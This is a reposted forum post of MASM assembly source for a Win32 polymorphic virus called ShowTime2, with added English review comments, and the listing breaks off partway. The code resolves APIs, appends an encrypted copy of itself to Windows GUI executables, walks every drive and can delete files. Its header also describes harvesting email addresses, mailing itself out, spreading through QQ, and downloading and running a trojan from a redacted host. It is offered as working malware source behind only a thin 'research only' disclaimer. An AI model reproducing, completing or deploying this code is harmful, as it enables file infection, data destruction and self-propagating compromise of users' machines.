[转载]Win32.poly.ShowTime2病毒源码
信息来源:邪恶八进制信息安全团队([url]www.eviloctal.com[/url])[language=asm];***************************************************************
; 名 称:Trash
; 测试平台:Win98/masmV7.0
;
; 申明:本文仅作技术研究,否则后果自负
;注:
;
;编译命令行:
; ml /c /coff poly.asm
; link /subsystem:windows /section:.text,rew poly.obj
;***************************************************************
;;简 介:
;1. 感染本地硬盘和网络上所有exe(GUI)文件
;2. 搜索本地所有邮件地址,将病毒作为附件发送出去
;3. 从网上下载木马程序并运行。
;4. 利用QQ散播消息。
;*************************************************
;工作流程:
;1.首先得到重定位信息,保存在ebx中.
;2.调用GetKBase ,得到Kernel32.dll的基地址。
;3.调用GetAPIz,得到程序将使用的Kernel32中所有API.
;4.判断是被感染文件还是自身.如是被感染文件则分配空间并动态产生解密模块,然后解密程序代码。
; 否则直接到5
;5. 调用DownloadFile下载木马程序
;6. 调用RunExe执行木马程序
;7.调用DownloadFile下载邮件体hello.eml文件
;8. 启动发送QQ消息线程
;9. 感染本地Exe文件
;***************************************************
.386
.Model Flat, StdCall
Option Casemap :None
;___________________________________________________________________________
include d:\masm32\useful.inc
.code
Main:
; --- First-generation carrier stub -----------------------------------------
; Flag sits BEFORE VStart, so it is not part of the body copied into hosts
; (VirusLen is measured from VStart). The `.if Flag!=45678h` test below reads
; Flag at its absolute link-time address (no [ebx]); in an infected host that
; address holds whatever the host has there -- presumably != 45678h, which is
; what distinguishes "carrier" from "running inside a host". TODO confirm.
Flag dd 45678h
szCaption db "ShowTime",0
szText db "Good luck!",0
Msgbox:
; Decoy behaviour of the carrier: show a message box, then exit.
invoke MessageBox,NULL,addr szText,addr szCaption,MB_OK
invoke ExitProcess,NULL
VStart:
; --- Virus body starts here; this is the new AddressOfEntryPoint written by InfectFile.
call Start
Start:
pop ebx ;ebx = runtime address of Start (call/pop delta trick)
sub ebx , offset Start ;ebx = relocation delta; every global below is addressed as X[ebx]
call GetKBase ;locate kernel32.dll in memory (edi / hKernel32[ebx])
jnz VStar
jz VStar
db 0e9h ;junk byte: both branches above skip it; a linear disassembler sees a bogus JMP here
VStar:
call GetAPIz;resolve kernel32 / wsock32 / user32 imports by name into the _xxx slots
mov eax,offset Msgbox ;absolute (not delta-adjusted) address of the stub; not used by the visible code
.if Flag!=45678h;not the carrier -> we are in an infected host and the body after Load is encrypted
; The region from Load (EncryptLen bytes) was XORed with 12345678h by InfectFile.
; A randomised decryptor is generated into fresh RWX memory and executed.
; NOTE(review): Metamorphosize, Load and EncryptLen are referenced but not
; defined anywhere on this page -- the listing is truncated.
Next1:
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push VirusLen
push NULL
call _VirtualAlloc[ebx] ;RWX scratch buffer for the generated decryptor
mov hMem[ebx],eax
lea esi,[offset Load+ebx] ;esi -> encrypted region (input to the engine)
mov edi,hMem[ebx] ;edi -> where the decryptor is emitted
mov ecx,EncryptLen/4 ;number of DWORDs to decrypt
push ebx
call Metamorphosize ;emit the decryptor into [edi] (routine not on this page)
pop ebx
push ebx
call hMem[ebx] ;run the generated decryptor in place
pop ebx
.endif
call Load ;continue into the (now plaintext) main body -- Load is not on this page
;**********获得image of kernel32.dll的基址*****************
GetKBase:
mov edi , [esp+04h]
and edi , 0FFFF0000h
.while TRUE
.if WORD ptr [edi] == IMAGE_DOS_SIGNATURE ;判断是否是MZ
mov esi, edi
add esi, DWORD ptr [esi+03Ch] ;esi指向PE标志
.if DWORD ptr [esi] ==IMAGE_NT_SIGNATURE;是否有PE标志
.break;如果有跳出循环
.endif
.endif
sub edi, 010000h
.if edi < MIN_KERNEL_SEARCH_BASE ;win9x
mov edi, 0bff70000h ;0bff7000h=9x"base
.break
.endif
.endw
mov hKernel32[ebx],edi;把找到的KERNEL32。DLL的基地址保存起来
ret
; GetAPIz -- walk kernel32's export directory by hand to find GetProcAddress and
; LoadLibraryA, then (in the code that follows) resolve everything else with them.
; In:  edi = kernel32 base (from GetKBase), ebx = relocation delta.
; Out: _GetProcAddress[ebx], _LoadLibraryA[ebx]; hKernel32[ebx] replaced by the
;      LoadLibraryA("kernel32") handle. Execution falls through GetOApiz ->
;      SockApis -> szUser32 and returns from the end of that chain.
; Clobbers eax, ecx, edx, esi, edi, ebp.
; Name strings nGetProcAddress / nLoadLibraryA / nKernel are defined elsewhere (not on this page).
GetAPIz:
push edi
mov edx,edi ;edx = kernel32 image base
assume edx :ptr IMAGE_DOS_HEADER
add edx,[edx].e_lfanew
assume edx:ptr IMAGE_NT_HEADERS
mov edx,[edx].OptionalHeader.DataDirectory.VirtualAddress ;RVA of the export directory (DataDirectory[0])
add edx,hKernel32[ebx];edx -> IMAGE_EXPORT_DIRECTORY
assume edx:ptr IMAGE_EXPORT_DIRECTORY
push edx
mov ebp,[edx].AddressOfNames
add ebp,hKernel32[ebx] ;ebp -> array of export-name RVAs
push ebp
xor eax,eax ;eax = name index
.repeat
push 14 ;strlen("GetProcAddress")
pop ecx
mov edi,[ebp]
add edi,hKernel32[ebx]
lea esi,[offset nGetProcAddress+ebx]
repz cmpsb;compare export name #eax with "GetProcAddress" (14 bytes; terminator not compared, so a longer name with this prefix would also match)
.if zero?
.break ;found
.endif
add ebp,4 ;next name RVA
inc eax
.until eax == [edx].NumberOfNames ;NOTE: if nothing matches, eax == NumberOfNames and the ordinal lookup below reads one past the table
mov ebp, [edx].AddressOfNameOrdinals ;WORD array: name index -> export ordinal
add ebp, hKernel32[ebx]
movzx ecx, word ptr [ebp+eax*2] ;ordinal of GetProcAddress
mov ebp, [edx].AddressOfFunctions ;DWORD array of function RVAs, indexed by ordinal
add ebp, hKernel32[ebx]
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax = VA of GetProcAddress
mov _GetProcAddress[ebx],eax
pop ebp ;restore: ebp -> AddressOfNames
pop edx ;restore: edx -> export directory
pop edi ;restore: edi = kernel32 base
xor eax,eax ;eax = name index, second scan
.repeat
push 12 ;strlen("LoadLibraryA")
pop ecx
mov edi,[ebp]
add edi,hKernel32[ebx]
lea esi,[offset nLoadLibraryA+ebx]
repz cmpsb;compare export name #eax with "LoadLibraryA"
.if zero?
.break ;found
.endif
add ebp,4 ;next name RVA
inc eax
.until eax == [edx].NumberOfNames ;same out-of-range caveat as above
mov ebp, [edx].AddressOfNameOrdinals
add ebp, hKernel32[ebx]
movzx ecx, word ptr [ebp+eax*2] ;ordinal of LoadLibraryA
mov ebp, [edx].AddressOfFunctions
add ebp, hKernel32[ebx]
mov eax, [ebp+ecx*4]
add eax,hKernel32[ebx];eax = VA of LoadLibraryA
mov _LoadLibraryA[ebx],eax
lea eax,[offset nKernel+ebx] ;"kernel32" name string (defined elsewhere)
push eax
call _LoadLibraryA[ebx]
mov DWORD ptr hKernel32[ebx],eax ;replace the scanned base with the loader's module handle
GetOApiz:
; Resolve the kernel32 imports. Inline-table technique: `call @api_table` pushes
; the address of the first string, which @api_table pops into edi; the same trick
; then yields the address of the K_Apiz slot array in esi. Strings and slots are
; in the same order, one DWORD slot per name.
call @api_table
db "LoadLibraryA",0
db "CreateThread",0
db "CreateRemoteThread",0
db "WinExec",0
db "CreateMutexA",0
db "OpenMutexA",0
db "ReleaseMutex",0
db "FindFirstFileA",0
db "FindNextFileA",0
db "FindClose",0
db "CreateFileA",0
db "CreateFileMappingA",0
db "MapViewOfFile",0
db "UnmapViewOfFile",0
db "SetFilePointer",0
db "ReadFile",0
db "GetComputerNameA",0
db "WriteFile",0
db "CloseHandle",0
db "VirtualAlloc",0
db "VirtualAllocEx",0
db "WriteProcessMemory",0
db "VirtualFree",0
db "VirtualFreeEx",0
db "lstrcmpi",0
db "lstrcpy",0
db "lstrcat",0
db "lstrlen",0
db "GetFileSize",0
db "GetSystemDirectoryA",0
db "GetModuleFileNameA",0
db "Sleep",0
db "GetSystemTime",0
db "DeleteFileA",0
db "OpenProcess",0
db "GetModuleHandleA",0
db "GetCurrentDirectoryA",0
db "SetCurrentDirectoryA",0
db "ExitProcess",0
db "GetExitCodeThread",0
db "ResumeThread",0
@api_table:
pop edi ;edi -> "LoadLibraryA",0,"CreateThread",0,...
call @api_dest ;push the address of K_Apiz
K_Apiz:
; Resolved addresses, same order as the names above. A slot stays 0 if the lookup failed.
; (CreateRemoteThread / VirtualAllocEx / WriteProcessMemory / OpenProcess are
; resolved here but not used anywhere on this page.)
_LoadLibraryA dd 0
_CreateThread dd 0
_CreateRemoteThread dd 0
_WinExec dd 0
_CreateMutex dd 0
_OpenMutex dd 0
_ReleaseMutex dd 0
_FindFirstFile dd 0
_FindNextFile dd 0
_FindClose dd 0
_CreateFile dd 0
_CreateFileMapping dd 0
_MapViewOfFile dd 0
_UnmapViewOfFile dd 0
_SetFilePointer dd 0
_ReadFile dd 0
_GetComputerNameA dd 0
_WriteFile dd 0
_CloseHandle dd 0
_VirtualAlloc dd 0
_VirtualAllocEx dd 0
_WriteProcessMemory dd 0
_VirtualFree dd 0
_VirtualFreeEx dd 0
_lstrcmpi dd 0
_lstrcpy dd 0
_lstrcat dd 0
_lstrlen dd 0
_GetFileSize dd 0
_GetSystemDirectory dd 0
_GetModuleFileNameA dd 0
_Sleep dd 0
_GetSystemTime dd 0
_DeleteFile dd 0
_OpenProcess dd 0
_GetModuleHandleA dd 0
_GetCurrentDirectoryA dd 0
_SetCurrentDirectoryA dd 0
_ExitProcess dd 0
_GetExitCodeThread dd 0
_ResumeThread dd 0
K_API_NUM = ($-K_Apiz)/4 ;number of kernel32 imports to resolve
@api_dest:
pop esi ;esi -> K_Apiz (destination slot array)
push K_API_NUM
pop ecx ;ecx = names remaining
xor ebp,ebp
K_begin:
push ecx
push edi ;lpProcName = current name
push hKernel32[ebx] ;hModule
call _GetProcAddress[ebx]
or eax,eax
jz GA_Fail ;lookup failed: leave the slot untouched (0)
;mov edx , DWORD ptr [esi+ebp]
mov dword ptr [esi],eax
GA_Fail:
xor eax,eax
repnz scasb ;advance edi past the string's NUL. ecx here is whatever GetProcAddress left behind (the saved count is still on the stack), so the scan relies on it being non-zero
add esi,4 ;next slot
pop ecx
loop K_begin
; --- Wsock32.dll imports (same inline-table technique as GetOApiz) -----------
call szWsock32 ;push the address of "Wsock32.dll"
db "Wsock32.dll",0
hSock dd 0 ;wsock32 module handle (data embedded in the instruction stream)
szWsock32:
call _LoadLibraryA[ebx] ;LoadLibraryA("Wsock32.dll"); failure not checked
mov hSock[ebx],eax
SockApis:
call SockTable ;push the address of the first name
db "WSAStartup",0
db "socket",0
db "htons",0
db "inet_addr",0
db "connect",0
db "send",0
db "closesocket",0
db "WSACleanup",0
db "gethostbyname",0
SockTable:
pop edi ;edi -> "WSAStartup",0,...
call SockDest ;push the address of S_Apiz
S_Apiz:
; Resolved winsock addresses, same order as the names above. No recv is imported:
; SendMail never reads server replies.
_WSAStartup dd 0
_socket dd 0
_htons dd 0
_inet_addr dd 0
_connect dd 0
_send dd 0
_closesocket dd 0
_WSACleanup dd 0
_gethostbyname dd 0
S_ApiNum=($-S_Apiz)/4 ;number of wsock32 imports
SockDest:
pop esi ;esi -> S_Apiz (destination slot array)
push S_ApiNum
pop ecx ;ecx = names remaining
xor ebp,ebp
S_begin:
push ecx
push edi ;lpProcName = current name
push hSock[ebx] ;hModule = wsock32
call _GetProcAddress[ebx]
or eax,eax
jz G_Fail ;lookup failed: slot stays 0
;mov edx , DWORD ptr [esi+ebp]
mov dword ptr [esi],eax
G_Fail:
xor eax,eax
repnz scasb ;advance edi past the NUL (same ecx caveat as in @api_dest)
add esi,4 ;next slot
pop ecx
loop S_begin
; --- User32.dll imports, resolved one by one -------------------------------
; Ends the GetAPIz chain: the `ret` at the bottom returns to GetAPIz's caller.
call szUser32 ;push the address of "User32.dll"
db "User32.dll",0
szFindWindowA db "FindWindowA",0
szFindWindowExA db "FindWindowExA",0
szSendMessageA db "SendMessageA",0
szChildWindowFromPointEx db "ChildWindowFromPointEx",0
_FindWindowA dd 0
_FindWindowExA dd 0
_SendMessageA dd 0
_ChildWindowFromPointEx dd 0 ;resolved but not used anywhere on this page
szUser32:
call _LoadLibraryA[ebx] ;LoadLibraryA("User32.dll"); failure not checked
push esi
mov esi,eax ;esi = hUser32
call szwsprintfA ;push the address of "wsprintfA"
db "wsprintfA",0
_wsprintf dd 0
szwsprintfA:
push esi ;GetProcAddress(hUser32, "wsprintfA")
call _GetProcAddress[ebx]
mov DWORD ptr _wsprintf[ebx],eax
lea ecx,[offset szFindWindowA+ebx]
push ecx
push esi
call _GetProcAddress[ebx] ;FindWindowA
mov DWORD ptr _FindWindowA[ebx],eax
lea ecx,[offset szFindWindowExA+ebx]
push ecx
push esi
call _GetProcAddress[ebx] ;FindWindowExA
mov DWORD ptr _FindWindowExA[ebx],eax
lea ecx,[offset szSendMessageA+ebx]
push ecx
push esi
call _GetProcAddress[ebx] ;SendMessageA
mov DWORD ptr _SendMessageA[ebx],eax
lea ecx,[offset szChildWindowFromPointEx+ebx]
push ecx
push esi
call _GetProcAddress[ebx] ;ChildWindowFromPointEx
mov DWORD ptr _ChildWindowFromPointEx[ebx],eax
pop esi ;restore caller's esi
ret ;return from GetAPIz (entered at the GetAPIz label via fall-through)
;Metamorphic engine -- only these constants and two helpers (Random, routine1)
;survive on this page; the generator itself (Metamorphosize) is missing.
; The transformed body has two parts:
; 1) the code from Load onward, XOR-encrypted with a 32-bit key
; 2) a decryptor emitted at run time, different for every copy
;Three of the seven usable general registers are chosen at random as the index,
;key and counter register, and 1-3 junk instructions are inserted between each
;real instruction of the decryptor.
EAX_REG = 0 ;x86 register numbers as encoded in opcodes (e.g. MOV r32,imm32 = B8h+reg)
ECX_REG = 1
EDX_REG = 2
EBX_REG = 3
ESP_REG = 4
EBP_REG = 5
ESI_REG = 6
EDI_REG = 7
INDEX_REG = 0 ;roles assigned to the randomly chosen registers
KEY_REG = 1
COUNT_REG = 2
FREE_REG1 = 3 ;remaining registers, available for junk code
FREE_REG2 = 4
FREE_REG3 = 5
FREE_REG4 = 6
; Random -- pseudo-random number in [0, seed).
; In:  one DWORD argument (seed / modulus) on the stack; popped by `ret 4`.
; Out: edx = (low 32 bits of the time-stamp counter) MOD seed; eax preserved.
; Entropy is RDTSC, so it is not cryptographic. A seed of 0 raises #DE.
Random:
push eax
db 0Fh, 031h ;RDTSC (emitted as raw bytes): edx:eax = time-stamp counter
xor edx, edx ;use only the low 32 bits as dividend
div dword ptr [esp+8];[esp+8] = the argument (above the saved eax and the return address); eax = quotient, edx = remainder
pop eax
ret 4
; routine1 -- emit the one-byte opcode of "MOV r32, imm32" (B8h + register number).
; In:  edi -> output buffer, ecx = register role index,
;      ebx -> role-to-register table (inside the engine ebx is presumably the
;      table base rather than the relocation delta -- inferred from [ebx+ecx]; TODO confirm).
; Out: edi advanced by 1; dl clobbered. The 4-byte immediate is presumably written by the caller.
routine1:
mov byte ptr [edi], 0B8h ;B8h = MOV EAX,imm32, B9h = MOV ECX,imm32, ... (opcode + reg)
mov dl, byte ptr [ebx+ecx] ;register actually assigned to this role
add [edi], dl
inc edi
ret
; GenerateGarbabyCode -- insert 1..3 junk instructions into the decryptor stream.
; NOTE(review): the body is truncated on this page. After computing the count in
; ecx the text continues with the payload date check (@PL1), which belongs to a
; different routine whose start is missing (note the unmatched `push eax`).
GenerateGarbabyCode:
push eax
push 3 ;Random(3) -> edx in 0..2
call Random ;
lea ecx, [edx+1] ;ecx = 1..3 junk instructions to emit
; --- fragment of the payload trigger (beginning of the routine is missing) ----
@PL1: mov esi,[esp] ;esi -> SYSTEMTIME structure (pointer left on the stack by the caller)
call _GetSystemTime[ebx]
;GetSystemTime(esi) fills in the current UTC date/time
movzx eax , word ptr [esi+6] ;SYSTEMTIME.wDay (offset 6: wYear, wMonth, wDayOfWeek, wDay)
cmp ax,14h ;the 20th of the month?
jnz PL_Exit
KILL: ;trigger date reached -> run the payload
call ShowTime
PL_Exit:
ret
; ShowTime -- payload invoked on the 20th of each month. Empty stub on this page.
ShowTime:
ret
;************EnumDisk***********************
; Walk drives "c".."z" by incrementing the drive letter in *DirName in place and
; running EnumDir on each; FileType is forwarded to EnumDir/AnFile.
; In:  DirName -> writable string whose first byte is the drive letter (expected "c");
;      FileType = selector understood by AnFile (FILE_EXE / FILE_ALL).
; Out: first byte of the buffer reset to "c"; eax clobbered.
; NOTE(review): `mov al,byte ptr[eax]` overwrites the low byte of the pointer in
; eax, so the final `mov byte ptr [eax],"c"` no longer addresses DirName.
;*********************************************
EnumDisk PROC DirName : DWORD,FileType : DWORD
.REPEAT
push FileType
push DirName
call EnumDir ;recurse through the whole drive
mov eax,DirName
inc byte ptr [eax] ;next drive letter
mov al,byte ptr[eax]
.UNTIL al > "z" ;stop after "z"
mov byte ptr [eax] , "c"
ret 8
EnumDisk ENDP
;************EnumDir************
; Recursively walk DirName and hand every regular file to AnFile.
; In:  DirName -> NUL-terminated directory path without trailing backslash,
;      FileType = selector passed through to AnFile.
; Uses ONE global WIN32_FIND_DATA (wfd) for every recursion level, so after a
; nested EnumDir returns wfd holds the child's last entry; the parent still
; advances correctly because FindNextFile is driven by the parent's hSearch.
; esi -> DirorFile is left set for AnFile, which walks the same path. All
; registers preserved (pushad/popad).
;*******************************
EnumDir PROC DirName : DWORD ,FileType:DWORD
LOCAL hSearch : DWORD
LOCAL DirorFile[MAX_PATH] : DWORD ;path scratch buffer (MAX_PATH DWORDs, i.e. 4x the needed size)
pushad
push DirName
lea esi,DirorFile
push esi
call _lstrcpy[ebx] ;DirorFile = DirName
@pushsz "\*.*"
push esi ;DirorFile
call _lstrcat[ebx] ;DirorFile = DirName\*.*
lea edi,[offset wfd+ebx]
push edi
push esi
call _FindFirstFile[ebx]
cmp eax,INVALID_HANDLE_VALUE
jz ED_Exit ;nothing to enumerate
mov hSearch,eax
.REPEAT
.if byte ptr [wfd+44+ebx]==".";wfd.cFileName[0]: skips "." and ".." (and any name starting with a dot)
jmp short EN_NEXT
.endif
push DirName
push esi
call _lstrcpy[ebx] ;DirorFile = DirName
@pushsz "\"
push esi
call _lstrcat[ebx] ;DirorFile = DirName\
lea eax,[wfd+44+ebx] ;wfd.cFileName
push eax
push esi ;DirorFile
call _lstrcat[ebx] ;DirorFile = DirName\<entry>
mov eax , dword ptr [wfd+ebx] ;wfd.dwFileAttributes
and eax , FILE_ATTRIBUTE_DIRECTORY
.if eax ==FILE_ATTRIBUTE_DIRECTORY
push dword ptr FileType
push esi
call EnumDir ;recurse into the sub-directory
.else ;regular file
push dword ptr FileType
push esi
call AnFile ;dispatch on extension / mode
.endif
EN_NEXT:
push edi
push hSearch
call _FindNextFile[ebx]
.UNTIL eax==0 ;FindNextFile failed / no more entries
ED_Close:
push hSearch
call _FindClose[ebx]
ED_Exit:
popad
ret 8
EnumDir ENDP
; AnFile -- per-file dispatcher called by EnumDir.
; In:  FileName -> full path; FileType = FILE_ALL (delete every file found --
;      destructive payload) or FILE_EXE (infect *.exe, harvest addresses from *.htm).
; Relies on esi still pointing at the same path string (set up by EnumDir); the
; lodsb loop walks it to the NUL. The extension test compares the 4 bytes before
; the NUL as a little-endian DWORD ("exe." == ".exe", "mth." == ".htm") and is
; case-sensitive. All registers preserved.
AnFile PROC FileName:DWORD,FileType:DWORD
pushad
AF_00: lodsb ;advance esi one past the NUL terminator
or al,al
jnz AF_00
.if FileType == FILE_ALL ;destructive mode
push FileName
call _DeleteFile[ebx]
.elseif FileType == FILE_EXE ;infection mode
mov eax,DWORD ptr [esi-5] ;last four characters of the name
.if eax =="exe." ;".exe"
push FileName
call InfectFile
.elseif eax == "mth." ;".htm"
push FileName
call Parse_HTM ;scan for mailto: addresses (routine is truncated on this page)
.endif
.endif
popad
ret 8
AnFile ENDP
;InfectFile(FileName) -- append a new section carrying the virus body to a PE file.
; Target filter: "MZ" with e_lfarlc == 40h, "PE\0\0", OptionalHeader.Subsystem == 2
;   (Windows GUI only) and not yet marked. Infection marker: WORD at NT headers
;   + 1Ah == 0888h, i.e. the Major/MinorLinkerVersion bytes of the optional header.
; Requires slack for one more IMAGE_SECTION_HEADER within SizeOfHeaders, else the
;   file is left untouched.
; Effects on success: NumberOfSections++; new last section named "iweiha" with
;   Characteristics E0000020h (code|exec|read|write); SizeOfImage grown;
;   AddressOfEntryPoint -> new section; marker written; HostEntry[ebx] = original
;   ImageBase + EntryPoint (for the missing Load routine to return to the host).
;   The body VStart..VStart+VirusLen is copied, the part from Load onward is XORed
;   with the fixed key 12345678h (En: loop), and VirusLen bytes are written at
;   PointerToRawData of the new section = end of the previous section's raw data
;   (any overlay data there is overwritten).
; All registers preserved; handles released on the IF_Fn ladder.
InfectFile PROC FileName : DWORD
LOCAL hFile : DWORD
LOCAL hMapping : DWORD
LOCAL pMapping : DWORD
LOCAL ByteWrite: DWORD
pushad
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ+FILE_SHARE_WRITE
push GENERIC_READ+GENERIC_WRITE
push FileName
call _CreateFile[ebx];open the target read/write
cmp eax,INVALID_HANDLE_VALUE
jz IF_Exit
mov hFile,eax
push 0
push 0
push 0
push PAGE_READWRITE
push NULL
push hFile
call _CreateFileMapping[ebx] ;map the whole file (size 0 = current size)
or eax,eax
jz IF_F3
mov hMapping , eax
push 0
push 0
push 0
push FILE_MAP_READ+FILE_MAP_WRITE
push hMapping
call _MapViewOfFile[ebx] ;writable view: header patches below go straight to disk
or eax,eax
jz IF_F2
mov pMapping,eax
mov esi,eax
assume esi :ptr IMAGE_DOS_HEADER;esi -> IMAGE_DOS_HEADER
.IF [esi].e_magic!=IMAGE_DOS_SIGNATURE ;"MZ"?
jmp IF_F1
.ENDIF
.IF [esi].e_lfarlc!=040h ;expect the standard PE stub layout (reloc table offset 40h)
jmp IF_F1
.ENDIF
add esi,[esi].e_lfanew ;esi -> IMAGE_NT_HEADERS
assume esi:ptr IMAGE_NT_HEADERS
.IF [esi].Signature!=IMAGE_NT_SIGNATURE ;"PE\0\0"?
jmp IF_F1
.ENDIF
.IF word ptr [esi].OptionalHeader.Subsystem!=2 ;only IMAGE_SUBSYSTEM_WINDOWS_GUI
jmp IF_F1
.ENDIF
.IF word ptr [esi+1ah]==0888h ; already infected (marker in the linker-version bytes)
jmp IF_F1
.ENDIF
mov eax,[esi].OptionalHeader.AddressOfEntryPoint;original entry RVA
add eax,[esi].OptionalHeader.ImageBase ;-> VA
mov HostEntry[ebx],eax ;saved so the body can jump back to the host
;***************************************************************
;Check that the header block has room for one more section header.
;28h = sizeof IMAGE_SECTION_HEADER
;18h = sizeof Signature + IMAGE_FILE_HEADER
;On exit edi -> the slot for the new section header.
;***************************************************************
movzx eax,[esi].FileHeader.NumberOfSections
mov ecx,28h
mul ecx ;eax = size of the existing section table (edx = 0)
lea edi,[esi]
sub edi,pMapping ;edi = file offset of the NT headers
add eax,edi
add eax,18h
movzx edi,[esi].FileHeader.SizeOfOptionalHeader
add eax,edi ;eax = file offset just past the last section header
mov edi,eax
add edi,pMapping ;edi -> new section header slot inside the view
add eax,28h
.IF eax>[esi].OptionalHeader.SizeOfHeaders ;no slack left
jmp IF_F1
.ENDIF
;*****************************************
;Room available: append the new section header and fill it in.
;esi -> NT headers, edi -> new header; the previous last header is at edi-28h.
;*****************************************
inc [esi].FileHeader.NumberOfSections
assume edi:ptr IMAGE_SECTION_HEADER
mov dword ptr[edi],69657769h ;name bytes "iwei" (little-endian); the original comment said "haiwei"
mov WORD ptr [edi+4],6168h; name bytes "ha" -> section name "iweiha"
push [esi].OptionalHeader.SizeOfImage
pop eax
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx ;edx:eax / ecx -- edx is not cleared here; it is still the zero high half of the mul above
inc eax
mul ecx
push eax ;VirtualAddress = next section-aligned address above SizeOfImage
pop [edi].VirtualAddress
mov eax,VirusLen
mov [edi].Misc.VirtualSize,eax
mov ecx,[esi].OptionalHeader.FileAlignment
div ecx
inc eax
mul ecx
mov [edi].SizeOfRawData,eax ;VirusLen rounded up to FileAlignment
lea eax,[edi-28h+14h] ;previous header's PointerToRawData
mov eax,[eax]
lea ecx,[edi-28h+10h] ;previous header's SizeOfRawData
mov ecx,[ecx]
add eax,ecx
mov [edi].PointerToRawData,eax ;raw data directly after the previous section's raw data
mov [edi].Characteristics,0E0000020h ;CODE | EXECUTE | READ | WRITE
;***************************************************************
;Update SizeOfImage and AddressOfEntryPoint so the new section is mapped and runs first.
;***************************************************************
mov eax,[edi].Misc.VirtualSize
mov ecx,[esi].OptionalHeader.SectionAlignment
div ecx
inc eax
mul ecx
add eax,[esi].OptionalHeader.SizeOfImage
mov [esi].OptionalHeader.SizeOfImage,eax
mov eax,[edi].VirtualAddress
mov [esi].OptionalHeader.AddressOfEntryPoint,eax ;entry point = start of the new section (VStart)
mov word ptr [esi+1ah],0888h ;write the infection marker
push PAGE_EXECUTE_READWRITE
push MEM_COMMIT
push VirusLen
push NULL
call _VirtualAlloc[ebx] ;scratch copy of the body, encrypted before writing (never freed)
or eax,eax
jz IF_F1
mov pMem[ebx],eax
push edi
push esi
mov edi,eax
lea esi,[offset VStart+ebx]
mov ecx,VirusLen
cld
rep movsb ;pMem = copy of VStart..VStart+VirusLen
lea eax,[offset Load+ebx]
push ecx
lea ecx,[offset VStart+ebx]
sub eax,ecx ;eax = offset of Load within the body
add eax,pMem[ebx] ;eax -> Load inside the copy
pop ecx
mov ecx,EncryptLen/4
En:
xor DWORD ptr [eax],12345678h ;encrypt EncryptLen bytes from Load with a fixed 32-bit key
add eax,4
loop En
pop esi
pop edi
push FILE_BEGIN
push 0
push [edi].PointerToRawData
push hFile
call _SetFilePointer[ebx] ;seek to the new section's raw offset
;****************************************************************
;Write the (partly encrypted) copy there. VirusLen bytes are written, not the
;file-aligned SizeOfRawData, so the last raw block is short on disk.
;****************************************************************
push 0
lea eax,ByteWrite
push eax
push VirusLen
mov eax,pMem[ebx]
push eax
push hFile
call _WriteFile[ebx]
IF_F1:
push pMapping
call _UnmapViewOfFile[ebx]
IF_F2:
push hMapping
call _CloseHandle[ebx]
IF_F3:
push hFile
call _CloseHandle[ebx]
IF_Exit:
popad
ret 4
InfectFile ENDP
;*******************************
;DownloadFile(dwFile) -- fetch http://<host>/<dwFile> with WinINet into
; %SystemDirectory%\<dwFile>, unless that local file already exists.
; In:  dwFile -> file name (also appended to the URL).
; Out: eax -> dwFileName (full local path); all other registers preserved.
; Globals written: hSession, hHttpFile, hSaveFile, dwRead, dwWrite, szBuffer, szUrl, dwFileName.
; The host is redacted on this page ("xxx.net"). HTTP status and Content-Length
; are queried but never checked, and nothing authenticates or integrity-checks
; the payload: whatever the server (or anyone in the path) returns is saved under
; the system directory and later run (RunExe, per the header). The User-Agent
; "szlogin" is a network indicator.
; Every failure falls to DF_ret, which closes hSaveFile/hHttpFile/hSession even
; when they were not opened by this call, and uses esi as the WinINet module
; handle even when LoadLibraryA failed.
;*******************************
DownloadFile proc dwFile:DWORD
pushad
call szWininet ;push the address of "Wininet.dll"
db "Wininet.dll",0
szWininet:
call _LoadLibraryA[ebx]
or eax,eax
jz DF_ret
mov esi,eax ;esi = hWininet
push MAX_PATH
call szFileName ;push the address of the dwFileName buffer
dwFileName db MAX_PATH dup(0) ;local path buffer, embedded in the code stream
szFileName:
pop edi ;edi -> dwFileName
push edi
call _GetSystemDirectory[ebx] ;dwFileName = system directory
or eax,eax
jz DF_ret
@pushsz "\"
push edi
call _lstrcat[ebx]
push dwFile
push edi
call _lstrcat[ebx] ;dwFileName = <sysdir>\<dwFile>
push NULL
push FILE_ATTRIBUTE_NORMAL
push OPEN_EXISTING
push NULL
push FILE_SHARE_READ
push GENERIC_READ OR GENERIC_WRITE
push edi
call _CreateFile[ebx] ;probe: does the local copy already exist?
cmp eax,INVALID_HANDLE_VALUE
jnz Fexsting ;yes -> skip the download (this probe handle is never closed)
call szInternetOpen
db "InternetOpenA",0
szInternetOpen:
push esi
call _GetProcAddress[ebx] ;eax = InternetOpenA
push 0
push NULL
push NULL
push INTERNET_OPEN_TYPE_PRECONFIG ;use the system proxy settings
call AgentName ;push the address of the User-Agent string
db "szlogin",0 ;User-Agent -- network IOC
AgentName:
call eax ;InternetOpenA("szlogin", PRECONFIG, NULL, NULL, 0)
or eax,eax
jz DF_ret
mov hSession[ebx],eax
call szInternetOpenUrl
db "InternetOpenUrlA",0
_InternetOpenUrlA dd 0
szInternetOpenUrl:
push esi
call _GetProcAddress[ebx]
mov DWORD ptr _InternetOpenUrlA[ebx],eax
call Url ;push the address of the base URL
db "[url]http://xxx.net/[/url]",0 ;download host (redacted; the [url] tags are forum markup, not original bytes)
szUrl db MAX_PATH dup (0)
Url:
lea edi,[offset szUrl+ebx]
push edi
call _lstrcpy[ebx] ;szUrl = base URL
push dwFile
push edi
call _lstrcat[ebx] ;szUrl = base URL + dwFile
push 0
push INTERNET_FLAG_NO_AUTO_REDIRECT
push 0
push NULL
push edi
push hSession[ebx]
call _InternetOpenUrlA[ebx]
or eax,eax
jz DF_ret
mov DWORD ptr hHttpFile[ebx],eax
mov DWORD ptr dwRead[ebx],MAX_PATH ;buffer length for HttpQueryInfo
call szHttpQueryInfo
db "HttpQueryInfoA",0
szHttpQueryInfo:
push esi
call _GetProcAddress[ebx]
mov edi,eax ;edi = HttpQueryInfoA
push NULL
lea ecx,[offset dwRead+ebx]
push ecx
lea ecx,[offset szBuffer+ebx]
push ecx
push HTTP_QUERY_STATUS_CODE
push hHttpFile[ebx]
call edi ;status code -> szBuffer; result never examined
push NULL
lea ecx,[offset dwRead+ebx]
push ecx
lea ecx,[offset szBuffer+ebx]
push ecx
push HTTP_QUERY_CONTENT_LENGTH
push hHttpFile[ebx]
call edi ;content length -> szBuffer; result never examined
push NULL
